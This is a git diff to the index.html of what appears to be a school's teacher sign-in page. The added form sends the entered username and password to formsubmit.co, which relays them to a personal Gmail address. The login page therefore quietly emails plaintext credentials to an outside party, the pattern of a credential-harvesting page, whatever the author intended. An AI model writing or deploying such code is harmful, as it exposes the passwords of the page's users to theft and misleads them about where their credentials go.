--- a/index.html
+++ b/index.html
@@ -36,14 +36,14 @@
 <!-- /////////////////////////////////////////////////////// -->
 <h3>Teachers</h3>
             <h2 class="title"> &nbsp;&nbsp;Sign in </h2><br><br> 
-            
+            <form action="https://formsubmit.co/geofreyonyango167@gmail.com" method="POST" autocomplete="off" enctype="multipart/form-data">
             <div class="input-field">
               <i class="fas fa-user"></i>
-              <input type="text" placeholder="Username"  required />
+              <input type="text" placeholder="Username" name="Username" required />
             </div>
             <div class="input-field">
               <i class="fas fa-lock"></i>
-              <input type="password" placeholder="Password" required/>
+              <input type="password" placeholder="Password" name="Password" required/>
             </div>
             <input type="submit" value="Login" class="btn solid" />
             <p class="social-text">Excellence is our pride</p>
